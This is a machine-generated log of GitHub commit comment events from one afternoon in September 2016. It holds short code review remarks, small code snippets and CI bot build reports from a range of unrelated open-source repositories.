{"id":"4509704789","type":"CommitCommentEvent","actor":{"login":"mchurchward"},"repo":{"name":"POETGroup/moodle-filter_oembed"},"payload":{"comment":{"id":18883660,"position":null,"line":null,"path":null,"commit_id":"67262bb7cd543cf969ff379f042321ab8000efb8","created_at":"2016-09-02T17:19:51Z","updated_at":"2016-09-02T17:19:51Z","body":"Really, I only did this in order to familiarize myself with how it works, and to add a page where I could see the details of each provider. I would appreciate you taking it and running with it. Don't be afraid to scrap it all.\r\nWhat I think is needed is the ability to edit any provider, except for a plugin. If a downloaded provider is edited, it should be saved as a new local, and the downloaded one disabled. At least, that's what I'm thinking.\r\n"}},"created_at":"2016-09-02T17:19:51Z"}
{"id":"4509705768","type":"CommitCommentEvent","actor":{"login":"ekmett"},"repo":{"name":"ekmett/bound"},"payload":{"comment":{"id":18883663,"position":null,"line":null,"path":null,"commit_id":"5498605efafcacb6091453b3f2be7d934aedec75","created_at":"2016-09-02T17:20:05Z","updated_at":"2016-09-02T17:20:05Z","body":"If you wanted to put together a patch for just a 1.08 delta I could be\ntalked into it.\n\n\nOn Fri, Sep 2, 2016 at 10:10 AM, Stuart Popejoy <notifications@github.com>\nwrote:\n\n> Any chance we can get 1.0.8 on hackage (for the new transformers)? Seems\n> like 2.0 is a bigger change. If I can help with this let me know.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ekmett/bound/commit/5498605efafcacb6091453b3f2be7d934aedec75#commitcomment-18880818>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASmERhsPQDCqwNQCphMZc3syfHzk07wks5qmC5IgaJpZM4Jzvug>\n> .\n>\n"}},"created_at":"2016-09-02T17:20:05Z"}
{"id":"4509708534","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18883668,"position":34,"line":34,"path":"pkgs/applications/science/programming/dafny/default.nix","commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T17:20:38Z","updated_at":"2016-09-02T17:20:38Z","body":"why did you have to `cd ..` ?"}},"created_at":"2016-09-02T17:20:38Z"}
{"id":"4509708914","type":"CommitCommentEvent","actor":{"login":"horvatm"},"repo":{"name":"phoebe-project/phoebe2"},"payload":{"comment":{"id":18883670,"position":null,"line":null,"path":null,"commit_id":"20b500486364d24501e019f26c8e26f6dd0d622a","created_at":"2016-09-02T17:20:42Z","updated_at":"2016-09-02T17:20:42Z","body":"WD atmospheres python interface update. Now you can do this:\r\n\r\n``` python\r\nimport numpy as np\r\nfrom libphoebe import *\r\n\r\nt = 6000.\r\nifil = 1\r\n\r\ntable=wd_readdata(\"../atm/atmcofplanck.dat\", \"../atm/atmcof.dat\")\r\n\r\nprint \"==single value==\"\r\nres_planck=wd_planckint(t, ifil, table[\"planck_table\"])\r\nprint \"planck:\", res_planck\r\n\r\nlogg = 2.\r\nabunin = 0.5\r\nres_atm=wd_atmint(t, logg, abunin, ifil, table[\"planck_table\"], table[\"atm_table\"])\r\nprint \"atm:\", res_atm\r\n\r\nprint \"\\n== arrays without abundances==\"\r\n\r\nt=np.array([5000.0, 6000.0, 7000.0])\r\nres_planck=wd_planckint(t, ifil, table[\"planck_table\"])\r\nprint \"planck:\", res_planck\r\n\r\nlogg = np.array([1.0, 2.0, 3.0]);\r\nabunin = np.array([0.5, 0.9, 1.0]);\r\n\r\nres_atm=wd_atmint(t, logg, abunin, ifil, table[\"planck_table\"], table[\"atm_table\"])\r\nprint \"atm:\",res_atm\r\n\r\n\r\nprint \"\\n== arrays with abundances==\"\r\n\r\nt=np.array([5000.0, 6000.0, 7000.0])\r\nres_planck=wd_planckint(t, ifil, table[\"planck_table\"])\r\nprint \"planck:\", res_planck\r\n\r\nlogg = np.array([1.0, 2.0, 3.0]);\r\nabunin = np.array([0.5, 0.9, 1.0]);\r\n\r\nres_atm=wd_atmint(t, logg, abunin, ifil, table[\"planck_table\"], table[\"atm_table\"], return_abunin = True)\r\nprint \"atm:\", res_atm\r\n```"}},"created_at":"2016-09-02T17:20:42Z"}
{"id":"4509709461","type":"CommitCommentEvent","actor":{"login":"rishig"},"repo":{"name":"brockwhittaker/zulip"},"payload":{"comment":{"id":18883674,"position":135,"line":82,"path":"static/templates/settings_tab.handlebars","commit_id":"d471bda9f8a811ca62e84f40df356f49cdd2ec63","created_at":"2016-09-02T17:20:50Z","updated_at":"2016-09-02T17:20:50Z","body":"Interesting choice. I think it makes sense to leave this translated? But no strong opinion."}},"created_at":"2016-09-02T17:20:50Z"}
{"id":"4509709517","type":"CommitCommentEvent","actor":{"login":"mchurchward"},"repo":{"name":"POETGroup/moodle-filter_oembed"},"payload":{"comment":{"id":18883675,"position":25,"line":25,"path":"db/subplugins.php","commit_id":"671f3fc9b87b4590fe597471c8eaddd15c960c95","created_at":"2016-09-02T17:20:51Z","updated_at":"2016-09-02T17:20:51Z","body":"I worried about that too. I'll refactor it outside of the classes directory."}},"created_at":"2016-09-02T17:20:51Z"}
{"id":"4509710062","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18883677,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-02T17:20:58Z","updated_at":"2016-09-02T17:20:58Z","body":"طيب ع هادا الكلام انا ممكن اريح راسي و اعمل اسيرشن انو اشوف عدد الايتم بعد عمليتين اضافة لنفس المنتج ازا ضل واححد معناتو نفس المنتج معناتو الاختبار المفترض يقولي انو المنتج انضاف مرتين و اوريدي دالة الاضافة جمعت الكمية \r\n"}},"created_at":"2016-09-02T17:20:58Z"}
{"id":"4509711178","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"generate/generate-package"},"payload":{"comment":{"id":18883682,"position":12,"line":12,"path":"templates/min.json","commit_id":"33c9d8a27eb8861f12aff15fc0237365d920e16a","created_at":"2016-09-02T17:21:13Z","updated_at":"2016-09-02T17:21:13Z","body":":+1: \r\n\r\nit can also be composed by `repository + /issues`."}},"created_at":"2016-09-02T17:21:13Z"}
{"id":"4509712141","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18883684,"position":null,"line":null,"path":null,"commit_id":"ded6c7ef23ec2b2b1e99dc163d51bf7fb3e842e6","created_at":"2016-09-02T17:21:26Z","updated_at":"2016-09-02T17:21:26Z","body":"a Page Home_student ainda não está completo."}},"created_at":"2016-09-02T17:21:26Z"}
{"id":"4509713214","type":"CommitCommentEvent","actor":{"login":"anu788"},"repo":{"name":"drishticone/2.0.0"},"payload":{"comment":{"id":18883688,"position":null,"line":null,"path":null,"commit_id":"90edd8cb02ec853b345809fe18d42501a7d0adb7","created_at":"2016-09-02T17:21:40Z","updated_at":"2016-09-02T17:21:40Z","body":"sir ye file glti se  push ho gyi"}},"created_at":"2016-09-02T17:21:40Z"}
{"id":"4509713218","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18883687,"position":4,"line":41,"path":"pkgs/development/compilers/mono/generic.nix","commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T17:21:40Z","updated_at":"2016-09-02T17:21:40Z","body":"Did that help?\r\n"}},"created_at":"2016-09-02T17:21:40Z"}
{"id":"4509716806","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18883702,"position":12,"line":12,"path":"dotnetexec.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T17:22:24Z","updated_at":"2016-09-02T17:22:24Z","body":"Using this script allows us to set the working directory and more importantly the shared framework version.  If we can eliminate it I'm all for it but I wasn't able to get a core app to run when the FX version in the runtime config doesn't match with the installed shared framework.\r\nCan you elaborate on how this won't work for other tools?"}},"created_at":"2016-09-02T17:22:24Z"}
{"id":"4509718069","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883705,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T17:22:38Z","updated_at":"2016-09-02T17:22:38Z","body":"PR sent https://github.com/driftyco/ionic-native/pull/524 with the changes we discussed, I added a console warning as well for the edge cases where this might not work, so at least the user will at least be aware 😄 "}},"created_at":"2016-09-02T17:22:38Z"}
{"id":"4509719228","type":"CommitCommentEvent","actor":{"login":"Xander9188"},"repo":{"name":"Prawith/NecroBot"},"payload":{"comment":{"id":18883724,"position":null,"line":null,"path":null,"commit_id":"326fbc4f69b1fb962259c1c1a2e94af9a8f8823a","created_at":"2016-09-02T17:22:49Z","updated_at":"2016-09-02T17:22:49Z","body":"For some reason when i try to run the master version it says necrobot.exe is missing... any ideas?"}},"created_at":"2016-09-02T17:22:49Z"}
{"id":"4509719500","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18883729,"position":3,"line":3,"path":"pkgs/applications/science/programming/dafny/default.nix","commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T17:22:52Z","updated_at":"2016-09-02T17:22:52Z","body":"This would probably belong in `pkgs/top-level/dotnet-packages.nix`"}},"created_at":"2016-09-02T17:22:52Z"}
{"id":"4509721131","type":"CommitCommentEvent","actor":{"login":"Xander9188"},"repo":{"name":"Prawith/NecroBot"},"payload":{"comment":{"id":18883766,"position":null,"line":null,"path":null,"commit_id":"326fbc4f69b1fb962259c1c1a2e94af9a8f8823a","created_at":"2016-09-02T17:23:10Z","updated_at":"2016-09-02T17:23:10Z","body":"By the way, thanks for replying to my thread."}},"created_at":"2016-09-02T17:23:10Z"}
{"id":"4509723135","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18883812,"position":null,"line":null,"path":null,"commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T17:23:33Z","updated_at":"2016-09-02T17:23:33Z","body":"Put a few inline comments but overall very nice work!"}},"created_at":"2016-09-02T17:23:33Z"}
{"id":"4509727462","type":"CommitCommentEvent","actor":{"login":"git-matt"},"repo":{"name":"git-matt/simpleinvoices-1"},"payload":{"comment":{"id":18883854,"position":null,"line":null,"path":null,"commit_id":"8c5d5a48feb79dc00c48e95fa448c5524b5bc0d7","created_at":"2016-09-02T17:24:30Z","updated_at":"2016-09-02T17:24:30Z","body":"personal settings removed"}},"created_at":"2016-09-02T17:24:30Z"}
{"id":"4509729168","type":"CommitCommentEvent","actor":{"login":"KanishkaPicaros"},"repo":{"name":"KanishkaPicaros/EsbpII-ISO"},"payload":{"comment":{"id":18883860,"position":null,"line":null,"path":null,"commit_id":"09fb0781b74cd97f2b604207047b2fc5490de7a6","created_at":"2016-09-02T17:24:53Z","updated_at":"2016-09-02T17:24:53Z","body":"Link added"}},"created_at":"2016-09-02T17:24:53Z"}
{"id":"4509729448","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18883863,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-02T17:24:57Z","updated_at":"2016-09-02T17:24:57Z","body":"زي هيك \r\n```\r\npublic function add_new_product_or_increase_quantity()\r\n    {\r\n        $cart = new Cart();\r\n        $product1 = new product();\r\n        $product1->setPrice(3);\r\n        $product1->setName(\"Product A\");\r\n        $cart->AddToCart($product1,1);\r\n        $cart->AddToCart($product1,1);\r\n        $this->assertNotEquals(1,$cart->getNumOfItem());\r\n        print_r($cart->ViewCart());\r\n\r\n    }\r\n```"}},"created_at":"2016-09-02T17:24:57Z"}
{"id":"4509729841","type":"CommitCommentEvent","actor":{"login":"tagatac"},"repo":{"name":"tagatac/caja"},"payload":{"comment":{"id":18883866,"position":null,"line":null,"path":null,"commit_id":"988eee1c5e15828ef9b56ff10a46a95bffbffe76","created_at":"2016-09-02T17:25:02Z","updated_at":"2016-09-02T17:25:02Z","body":"Clement closed my [PR](https://github.com/mate-desktop/caja/pull/301) in favor of a \"[more complete solution](https://github.com/linuxmint/nemo/pull/987)\" to be ported from Nemo."}},"created_at":"2016-09-02T17:25:02Z"}
{"id":"4509732566","type":"CommitCommentEvent","actor":{"login":"kgoderis"},"repo":{"name":"kgoderis/smarthome"},"payload":{"comment":{"id":18883871,"position":36,"line":34,"path":"bundles/automation/org.eclipse.smarthome.automation.module.timer/src/main/java/org/eclipse/smarthome/automation/module/timer/handler/CallbackJob.java","commit_id":"826fc78270c34e1e99578a0ad2704939c0027798","created_at":"2016-09-02T17:25:38Z","updated_at":"2016-09-02T17:25:38Z","body":"@maggu2810 yes indeed. Beware, all the Rule related code should be neglected as I wrote this in the december 15-january  16 timeframe, before many other PRs on automation. I just wanted to point out the scheduler stuff"}},"created_at":"2016-09-02T17:25:38Z"}
{"id":"4509739675","type":"CommitCommentEvent","actor":{"login":"patflynn"},"repo":{"name":"GoogleCloudPlatform/app-maven-plugin"},"payload":{"comment":{"id":18883889,"position":null,"line":null,"path":null,"commit_id":"fb9d6c26e1e19b3f07060196094887a77ce7438e","created_at":"2016-09-02T17:27:13Z","updated_at":"2016-09-02T17:27:13Z","body":":+1: "}},"created_at":"2016-09-02T17:27:13Z"}
{"id":"4509740417","type":"CommitCommentEvent","actor":{"login":"Xander9188"},"repo":{"name":"Prawith/NecroBot"},"payload":{"comment":{"id":18883893,"position":null,"line":null,"path":null,"commit_id":"326fbc4f69b1fb962259c1c1a2e94af9a8f8823a","created_at":"2016-09-02T17:27:23Z","updated_at":"2016-09-02T17:27:23Z","body":"To be more specific, NecroBot-0.9.7\\PoGo.NecroBot.CLI\\bin\\Debug\\NecroBot.exe is missing"}},"created_at":"2016-09-02T17:27:23Z"}
{"id":"4509742813","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18883904,"position":null,"line":null,"path":null,"commit_id":"33d8973f143a548e4b5e87d67cab1ccf6099272d","created_at":"2016-09-02T17:27:57Z","updated_at":"2016-09-02T17:27:57Z","body":"The following doc(s) have been deployed to the [1849logs](https://1849logs-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/debug-log-files](https://1849logs-static-docs.pantheonsite.io/docs/debug-log-files)\n- [docs/guides/load-testing-with-blazemeter](https://1849logs-static-docs.pantheonsite.io/docs/guides/load-testing-with-blazemeter)\n- [docs/logs](https://1849logs-static-docs.pantheonsite.io/docs/logs)\n- [docs/php-errors](https://1849logs-static-docs.pantheonsite.io/docs/php-errors)\n- [docs/php-versions](https://1849logs-static-docs.pantheonsite.io/docs/php-versions)\n- [docs/debug-slow-performance](https://1849logs-static-docs.pantheonsite.io/docs/debug-slow-performance)\n- [docs/nginx-access-log](https://1849logs-static-docs.pantheonsite.io/docs/nginx-access-log)\n- [docs/guides/terminus](https://1849logs-static-docs.pantheonsite.io/docs/guides/terminus)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/a3ba81ea73ed94085eeccc6e7ee4a8f108928865/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-02T17:27:57Z"}
{"id":"4509743224","type":"CommitCommentEvent","actor":{"login":"xueliangsun"},"repo":{"name":"jasperlsy26/Cpts422"},"payload":{"comment":{"id":18883910,"position":91,"line":91,"path":"CPTS422HW1/CS422/IndexedNumsStream.cs","commit_id":"3e665465e4041dffebc4342a007ca4afb0dc5f56","created_at":"2016-09-02T17:28:04Z","updated_at":"2016-09-02T17:28:04Z","body":"Return Value\r\nType: System.Int32\r\nThe total number of bytes read into the buffer. This can be less than the number of bytes requested if that many bytes are not currently available, or zero (0) if the end of the stream has been reached.\r\nLink: https://msdn.microsoft.com/en-us/library/system.io.stream.read(v=vs.110).aspx"}},"created_at":"2016-09-02T17:28:04Z"}
{"id":"4509747801","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":18883926,"position":12,"line":31,"path":"js/src/main/scala/NodejsCEK.scala","commit_id":"82e3c52c836591193341d3fa9da881d2e88c3529","created_at":"2016-09-02T17:29:07Z","updated_at":"2016-09-02T17:29:07Z","body":"whoops"}},"created_at":"2016-09-02T17:29:07Z"}
{"id":"4509747907","type":"CommitCommentEvent","actor":{"login":"andela-ashuaib"},"repo":{"name":"aezumezu/inverted-index"},"payload":{"comment":{"id":18883927,"position":3,"line":3,"path":"src/invertedIndexLib.js","commit_id":"c0c354eb24df66bf77de350f6598368f12f41afc","created_at":"2016-09-02T17:29:09Z","updated_at":"2016-09-02T17:29:09Z","body":"```javascript \r\nvar myLibrary = {\r\nisObject = function() {\r\n},\r\nvalues = function(obj) { // your code\r\n }\r\n}\r\nmodule.exports = myLibrary\r\n```"}},"created_at":"2016-09-02T17:29:09Z"}
{"id":"4509748802","type":"CommitCommentEvent","actor":{"login":"yakiradixon"},"repo":{"name":"twtiger/gosecco"},"payload":{"comment":{"id":18883928,"position":null,"line":null,"path":null,"commit_id":"86f7e4be3da746bcda1e8eae6e102e35d598e623","created_at":"2016-09-02T17:29:18Z","updated_at":"2016-09-02T17:29:18Z","body":"When I restarted the build through Travis' interface, it didn't grab the latest commit. So the build was still red. :/"}},"created_at":"2016-09-02T17:29:18Z"}
{"id":"4509748988","type":"CommitCommentEvent","actor":{"login":"Xander9188"},"repo":{"name":"Prawith/NecroBot"},"payload":{"comment":{"id":18883929,"position":null,"line":null,"path":null,"commit_id":"326fbc4f69b1fb962259c1c1a2e94af9a8f8823a","created_at":"2016-09-02T17:29:21Z","updated_at":"2016-09-02T17:29:21Z","body":"Or if this will be implemented into the next release, don't worry about it. Ill just wait for the next release."}},"created_at":"2016-09-02T17:29:21Z"}
{"id":"4509750445","type":"CommitCommentEvent","actor":{"login":"mstevetodd"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18883933,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-02T17:29:40Z","updated_at":"2016-09-02T17:29:40Z","body":"I tried \r\n`@CheckForNull public <T>`\r\nand the error went away."}},"created_at":"2016-09-02T17:29:40Z"}
{"id":"4509752223","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883936,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T17:30:04Z","updated_at":"2016-09-02T17:30:04Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-MacOS-10.9-clang: OK (2326 of 2327 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T17:30:04Z"}
{"id":"4509764571","type":"CommitCommentEvent","actor":{"login":"maggu2810"},"repo":{"name":"kgoderis/smarthome"},"payload":{"comment":{"id":18883964,"position":36,"line":34,"path":"bundles/automation/org.eclipse.smarthome.automation.module.timer/src/main/java/org/eclipse/smarthome/automation/module/timer/handler/CallbackJob.java","commit_id":"826fc78270c34e1e99578a0ad2704939c0027798","created_at":"2016-09-02T17:32:47Z","updated_at":"2016-09-02T17:32:47Z","body":"Ah okay, thank you"}},"created_at":"2016-09-02T17:32:47Z"}
{"id":"4509764901","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883965,"position":null,"line":null,"path":null,"commit_id":"f6395ecd09e8f982df4f039b61393cc60dc6e56c","created_at":"2016-09-02T17:32:50Z","updated_at":"2016-09-02T17:32:50Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-02T17:32:50Z"}
{"id":"4509769397","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883971,"position":null,"line":null,"path":null,"commit_id":"f6395ecd09e8f982df4f039b61393cc60dc6e56c","created_at":"2016-09-02T17:33:46Z","updated_at":"2016-09-02T17:33:46Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T17:33:46Z"}
{"id":"4509773048","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":18883979,"position":null,"line":null,"path":null,"commit_id":"3514bf501cf8ff428fdff2b51f6c3f81264fb24b","created_at":"2016-09-02T17:34:35Z","updated_at":"2016-09-02T17:34:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Ltx6k99B&#x2F;17-feature-use-wallpaper-as-keyboard-s-background\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Feature] Use wallpaper as keyboard&#39;s background</a>"}},"created_at":"2016-09-02T17:34:35Z"}
{"id":"4509775380","type":"CommitCommentEvent","actor":{"login":"gioragutt"},"repo":{"name":"gioragutt/xna-ecs"},"payload":{"comment":{"id":18883982,"position":0,"line":0,"path":"XnaTry/XnaTry/XnaTry/XnaTry.csproj","commit_id":"3d148e0cb2765b57e97a29936935daab003880f3","created_at":"2016-09-02T17:35:07Z","updated_at":"2016-09-02T17:35:07Z","body":"Test"}},"created_at":"2016-09-02T17:35:07Z"}
{"id":"4509789454","type":"CommitCommentEvent","actor":{"login":"LoganSWarner"},"repo":{"name":"GammaGames/PythonGUIdemoDev"},"payload":{"comment":{"id":18884016,"position":null,"line":null,"path":null,"commit_id":"8582901b4c212e1c0b31be975df6c46ad4eafd50","created_at":"2016-09-02T17:38:03Z","updated_at":"2016-09-02T17:38:03Z","body":"Well, that's a fair bit of automatically generated changes, but it works the same apparently."}},"created_at":"2016-09-02T17:38:03Z"}
{"id":"4509790903","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18884021,"position":null,"line":null,"path":null,"commit_id":"b35204de2256f0397094dffa9ca4b36cf92e7363","created_at":"2016-09-02T17:38:21Z","updated_at":"2016-09-02T17:38:21Z","body":"saw approval from fadushin\nat https://github.com/basho/yokozuna/commit/b35204de2256f0397094dffa9ca4b36cf92e7363"}},"created_at":"2016-09-02T17:38:21Z"}
{"id":"4509790989","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18884022,"position":null,"line":null,"path":null,"commit_id":"b35204de2256f0397094dffa9ca4b36cf92e7363","created_at":"2016-09-02T17:38:21Z","updated_at":"2016-09-02T17:38:21Z","body":"merging basho/yokozuna/feature-zl-hll_datatypes = b35204de into borshop-integration-658-feature-zl-hll_datatypes"}},"created_at":"2016-09-02T17:38:21Z"}
{"id":"4509790992","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18884023,"position":null,"line":null,"path":null,"commit_id":"b35204de2256f0397094dffa9ca4b36cf92e7363","created_at":"2016-09-02T17:38:22Z","updated_at":"2016-09-02T17:38:22Z","body":"basho/yokozuna/feature-zl-hll_datatypes = b35204de merged ok, testing candidate = 2bb920ae"}},"created_at":"2016-09-02T17:38:22Z"}
{"id":"4509792906","type":"CommitCommentEvent","actor":{"login":"out386"},"repo":{"name":"dev-harsh1998/misc"},"payload":{"comment":{"id":18884026,"position":null,"line":null,"path":null,"commit_id":"70703670bc93fb9d32a9ed637eab993d8e0db3e6","created_at":"2016-09-02T17:38:45Z","updated_at":"2016-09-02T17:38:45Z","body":"Some commits are worth ignoring. Or not worth paying attention to, whichever way you prefer to see it. "}},"created_at":"2016-09-02T17:38:45Z"}
{"id":"4509793043","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18884027,"position":null,"line":null,"path":null,"commit_id":"0d13f821194900c689b438146bf3eb602a2ad0b9","created_at":"2016-09-02T17:38:47Z","updated_at":"2016-09-02T17:38:47Z","body":"xD"}},"created_at":"2016-09-02T17:38:47Z"}
{"id":"4509794159","type":"CommitCommentEvent","actor":{"login":"williambize"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":18884029,"position":null,"line":null,"path":null,"commit_id":"8b2eb5e387d2272cf25baeb7647f88f5fadc10c5","created_at":"2016-09-02T17:39:00Z","updated_at":"2016-09-02T17:39:00Z","body":"@kandy are these 2 files still needed in Magento 2.1.1 community edition to solve the issue of \"URL key for specified store already exists\" ?\r\n\r\nThanks in advance!"}},"created_at":"2016-09-02T17:39:00Z"}
{"id":"4509794648","type":"CommitCommentEvent","actor":{"login":"MarkY-LunarG"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18884030,"position":12,"line":30,"path":"loader/dev_ext_trampoline.c","commit_id":"806a9ad302df9bf595fc3debf57385e04934ef39","created_at":"2016-09-02T17:39:08Z","updated_at":"2016-09-02T17:39:08Z","body":"Will do"}},"created_at":"2016-09-02T17:39:08Z"}
{"id":"4509799511","type":"CommitCommentEvent","actor":{"login":"QuietMisdreavus"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18884051,"position":null,"line":null,"path":null,"commit_id":"0d13f821194900c689b438146bf3eb602a2ad0b9","created_at":"2016-09-02T17:40:08Z","updated_at":"2016-09-02T17:40:08Z","body":"hey man, i got tired of seeing `examples/asdf.rs` in my untracked files list, but i didn't want to add it to the repo since it's mainly for one-off \"does this work\" things. maybe i'm using it wrong, but things that perform actions are harder to write a proper example around >_>"}},"created_at":"2016-09-02T17:40:08Z"}
{"id":"4509799524","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18884052,"position":45,"line":468,"path":"src/tweet/structs.rs","commit_id":"4406206f16841a0c154f39c690e0141d2ac9a8c6","created_at":"2016-09-02T17:40:08Z","updated_at":"2016-09-02T17:40:08Z","body":"this needs only be `no_run` and highlighting is `rust` by default, right?"}},"created_at":"2016-09-02T17:40:08Z"}
{"id":"4509805850","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18884066,"position":null,"line":null,"path":null,"commit_id":"e0d62b5e62b572e93b55bef01d5a6616e3296333","created_at":"2016-09-02T17:41:25Z","updated_at":"2016-09-02T17:41:25Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 12](http://teamcity.otenv.com/viewLog.html?buildId=5158355&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T17:41:25Z"}
{"id":"4509809754","type":"CommitCommentEvent","actor":{"login":"QuietMisdreavus"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18884079,"position":45,"line":468,"path":"src/tweet/structs.rs","commit_id":"4406206f16841a0c154f39c690e0141d2ac9a8c6","created_at":"2016-09-02T17:42:13Z","updated_at":"2016-09-02T17:42:13Z","body":"yup, but i'm following an old version of the \"documentation guidelines\" RFC that suggested you put `rust` on all your code blocks regardless. something about being able to extract the markdown and use in something that doesn't use `rust` by default."}},"created_at":"2016-09-02T17:42:13Z"}
